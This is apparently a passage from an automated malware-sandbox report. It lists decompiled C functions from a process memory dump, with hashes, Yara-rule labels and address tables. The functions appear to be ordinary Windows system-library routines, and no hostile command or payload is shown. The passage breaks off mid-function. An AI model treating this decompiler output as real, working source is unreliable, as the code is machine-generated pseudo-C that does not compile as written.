Instruction Fuzzy Hash: CC318D72A047919BC320DF68CD40A6AB7E9BF98701F044A2DF89587790F770F914CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0467C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0467C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04677D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04728D34(_v8, _t80);
					}
					E04672280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0466FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04728833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0466FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0469B180();
						if(_a4 != 0) {
							E04672280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0467BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0467BB2D(_t16, _t15);
						E0467B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0466FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0466FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0466FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0467c18d
0x0467c18f
0x0467c191
0x0467c19b
0x0467c1a0
0x0467c1d4
0x0467c1de
0x046c2d6e
0x0467c1e4
0x0467c1e4
0x0467c1e4
0x0467c1ec
0x046c2d7d
0x046c2d7d
0x0467c1f3
0x0467c1ff
0x046c2d88
0x046c2d8d
0x046c2d94
0x046c2d94
0x046c2d9f
0x046c2da4
0x046c2dab
0x046c2db0
0x046c2db2
0x046c2db3
0x046c2db4
0x046c2dbc
0x046c2dc3
0x046c2dc3
0x0467c205
0x0467c205
0x0467c208
0x0467c20e
0x0467c211
0x0467c216
0x0467c219
0x0467c21f
0x0467c222
0x0467c22c
0x0467c234
0x0467c23a
0x0467c23f
0x0467c245
0x0467c24b
0x0467c251
0x0467c25a
0x0467c276
0x0467c27d
0x0467c27d
0x0467c25c
0x0467c25c
0x00000000
0x0467c25e
0x0467c1a4
0x0467c1aa
0x0467c1b3
0x0467c265
0x0467c26c
0x0467c26c
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 672fd0d54e3a9bd40a4decc861c92c77412fcfe4be3d54b8cd8170086d76765b
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: B1313772B01546BEE704EBB4C490BE9F754BF52248F0441AEC52C47301FB347A4ADBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0468A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0468A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4747b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4747b10 = 8;
					 *0x4747b14 = 0x4747b0c;
					 *0x4747b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0468A990(0x4747b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0468A840(__edx, __ecx, __ecx, _t52, 0x4747b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4747b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4747b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4747b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04674620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4747b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0469F3E0(_t50,  *0x4747b14, _t8 >> 3);
						_t28 =  *0x4747b14; // 0x771c7b0c
						__eflags = _t28 - 0x4747b0c;
						if(_t28 != 0x4747b0c) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4747b14 = _t50;
						_t48 = _v12;
						 *0x4747b10 = _t9;
						goto L6;
					}
					 *0x4747b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0468a713
0x0468a714
0x0468a717
0x0468a71d
0x0468a720
0x0468a722
0x0468a727
0x0468a74a
0x0468a754
0x0468a75e
0x0468a768
0x0468a76a
0x0468a773
0x0468a78b
0x0468a790
0x0468a792
0x0468a741
0x0468a741
0x0468a743
0x0468a749
0x0468a749
0x0468a732
0x0468a73a
0x0468a797
0x0468a79d
0x0468a7a3
0x0468a7a9
0x0468a7b6
0x0468a7bc
0x0468a7ca
0x0468a7e0
0x0468a7e2
0x0468a7e4
0x046c9bf2
0x00000000
0x046c9bf2
0x0468a7ed
0x0468a7f2
0x0468a800
0x0468a805
0x0468a80d
0x0468a812
0x046c9c08
0x046c9c08
0x0468a818
0x0468a81b
0x0468a821
0x0468a824
0x00000000
0x0468a824
0x0468a7ae
0x00000000
0x0468a7ae
0x0468a73c
0x0468a73e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e84c0b934322a716c8c45c4d5af7a805ae6b15fedd151e00d3af730bdd604d7
Instruction ID: 23af7d901270ab04ace5817d947307411271b0516084dd99cbb617512b6bbc4a
Opcode Fuzzy Hash: 1e84c0b934322a716c8c45c4d5af7a805ae6b15fedd151e00d3af730bdd604d7
Instruction Fuzzy Hash: 963189B9600614ABD719DF58D880FBA77FAEB84790F148A5BE40587340E778AD02DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 046861A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E046861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04685E50(0x46367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04729D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0465F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x046861b3
0x046861b5
0x046861bd
0x046861c3
0x046861c7
0x046861d2
0x046861ff
0x046861ff
0x04686201
0x04686207
0x04686207
0x046861d4
0x046861d9
0x00000000
0x00000000
0x046861df
0x046861e2
0x00000000
0x00000000
0x046861e6
0x046861e8
0x046861ee
0x046861ee
0x046861f9
0x046c762f
0x046c7632
0x046c7635
0x046c7639
0x046c7640
0x046c766e
0x046c7675
0x00000000
0x00000000
0x046c7681
0x046c7689
0x046c768d
0x046c7691
0x046c7695
0x046c7699
0x046c76af
0x046c76b5
0x046c76b7
0x046c76b7
0x046c76d7
0x046c76dc
0x00000000
0x046c76dc
0x046c76a2
0x046c76a9
0x046c7651
0x046c7653
0x046c7653
0x046c7656
0x046c7656
0x00000000
0x046c7656
0x046c7644
0x046c7646
0x046c7648
0x046c7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f08a45aa37272fc1db09bfd213b57782fe7be7713e67a8d2ddfe1c64477ace
Instruction ID: ec12cf65dfc8db1408f12aea355ca68a63439d7542c936133d5e230985c6bbaa
Opcode Fuzzy Hash: a3f08a45aa37272fc1db09bfd213b57782fe7be7713e67a8d2ddfe1c64477ace
Instruction Fuzzy Hash: 51317A716053028FD360EF1AC900B26B7E4FB98B00F054A6DE9989B352F7B0E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04698EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04698EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x474d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04684E70(0x47486e4, 0x4699490, 0, 0);
					if( *0x47453e8 > 5 && E04698F33(0x47453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x47453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x47453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x463bc46;
						_t48 = E046D7B9C(0x47453e8, 0x463bc46, _t67, 0x47453e8, _t70,  &_v140);
					}
				}
				return E0469B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04698ec7
0x04698ed9
0x04698edc
0x04698ee6
0x04698ee9
0x04698eee
0x04698efc
0x04698f08
0x046d1349
0x046d1353
0x046d135d
0x046d1366
0x046d136f
0x046d1375
0x046d137c
0x046d1385
0x046d1390
0x046d1391
0x046d139c
0x046d139d
0x046d13a6
0x046d13ac
0x046d13b2
0x046d13b5
0x046d13bc
0x046d13bf
0x046d13c2
0x046d13c5
0x046d13c8
0x046d13cb
0x046d13ce
0x046d13d1
0x046d13d4
0x046d13d7
0x046d13da
0x046d13dd
0x046d13e0
0x046d13e3
0x046d13e6
0x046d13e9
0x046d13f6
0x046d1400
0x046d1400
0x04698f08
0x04698f32

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce70c9545606ddad3ef62bc59297d89745552ba5af334b174d634689002ce758
Instruction ID: 8c8dbed57287897224196b96208ae8ace72c3e59309c66a192f50f3285e04dc2
Opcode Fuzzy Hash: ce70c9545606ddad3ef62bc59297d89745552ba5af334b174d634689002ce758
Instruction Fuzzy Hash: 9041A1B1D003189FDB20DFAAD980AADFBF8FB48714F5041AEE549A7200E7746A45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0468E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0468E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04699670() < 0) {
					L046ADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4747b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04674620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0468E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0468e730
0x0468e736
0x0468e738
0x0468e73d
0x0468e73e
0x0468e740
0x0468e749
0x0468e765
0x0468e76a
0x0468e76b
0x0468e76c
0x0468e76d
0x0468e76e
0x0468e76f
0x0468e775
0x0468e777
0x0468e77e
0x046cb675
0x0468e784
0x0468e784
0x0468e789
0x0468e7a8
0x0468e7ac
0x0468e807
0x0468e7ae
0x0468e7ae
0x0468e7b1
0x0468e7b4
0x0468e7b9
0x0468e7c0
0x0468e7c4
0x0468e7ca
0x0468e7cc
0x00000000
0x0468e7d3
0x0468e7d6
0x00000000
0x00000000
0x0468e7ff
0x0468e802
0x00000000
0x00000000
0x0468e7f9
0x0468e7fc
0x00000000
0x00000000
0x0468e7f3
0x0468e7f6
0x00000000
0x00000000
0x0468e7ed
0x0468e7f0
0x00000000
0x00000000
0x0468e7e7
0x0468e7ea
0x00000000
0x00000000
0x046cb685
0x046cb688
0x00000000
0x00000000
0x046cb682
0x00000000
0x00000000
0x0468e7cc
0x0468e7d9
0x0468e7dc
0x0468e7de
0x0468e7de
0x0468e7ac
0x0468e7e4
0x0468e74b
0x0468e751
0x0468e759
0x0468e761
0x0468e761

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b2109a8b81e8ec9c22f07a1a542340bd7b903004b24393dfe333ab4382a16b
Instruction ID: 03157dd29c21ea3ff4deadaef394da1b1f4ea2ac707e85830851d035fb116e91
Opcode Fuzzy Hash: 99b2109a8b81e8ec9c22f07a1a542340bd7b903004b24393dfe333ab4382a16b
Instruction Fuzzy Hash: 5A318DB5A14249EFE704DF58D841B9AB7E8FB19314F14826AF904CB341E632EC80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0468BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0468BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4746100; // 0x33
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04672280(0xd, 0x1645f1a0);
				_t41 =  *0x47460f8; // 0x0
				if(_t41 != 0) {
					 *0x47460f8 =  *_t41;
					 *0x47460fc =  *0x47460fc + 0xffff;
				}
				E0466FFB0(_t41, 0x800, 0x1645f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x47460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04674620(0x4746100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4746100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0468bc36
0x0468bc42
0x0468bc45
0x0468bc4a
0x0468bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0468bc50
0x0468bc50
0x0468bc58
0x0468bc5a
0x0468bc60
0x00000000
0x00000000
0x046ca4f2
0x046ca4f6
0x00000000
0x00000000
0x00000000
0x046ca4fc
0x0468bc79
0x0468bc7e
0x0468bc86
0x0468bd16
0x0468bd20
0x0468bd20
0x0468bc8d
0x0468bc94
0x0468bcbd
0x0468bcca
0x0468bccb
0x0468bccc
0x0468bccd
0x0468bcce
0x0468bcd4
0x0468bcea
0x0468bcee
0x0468bcf2
0x0468bd00
0x0468bd04
0x00000000
0x0468bc96
0x0468bcab
0x0468bcaf
0x0468bd2c
0x0468bd2c
0x0468bd09
0x00000000
0x0468bd09
0x0468bcb1
0x0468bcb5
0x0468bcbb
0x00000000
0x00000000
0x00000000
0x0468bcbb

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f933310f2fbc4325bd30e25e734ea0cd3649bc7a7dd3cc98a34e8c877f4e1749
Instruction ID: 87f46b5f172fc2842e988eedf0e22d1cacfbcdfbfea29f9e0922e57c50ba0805
Opcode Fuzzy Hash: f933310f2fbc4325bd30e25e734ea0cd3649bc7a7dd3cc98a34e8c877f4e1749
Instruction Fuzzy Hash: E531EC76A00605ABDB11EF58C4C0BA673A4EB69714F14867EE914DB301FB78FD0A8B80

Uniqueness

Uniqueness Score: -1.00%

Function 04659100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04659100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x472f6e8);
				E046AD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E047288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E046AD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x47486c0; // 0x28807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x47486b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04672280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E047288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0469AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x474b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x47484c0;
										if(_t69 >=  *0x47484c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04729063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0465922A(_t82);
							_t53 = E04677D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04728B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x47486c0; // 0x28807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x47486b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x47486bc;
										_t72 = 0x47486b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04659240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x47486c4;
									_t72 = 0x47486c0;
									L18:
									E04689B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
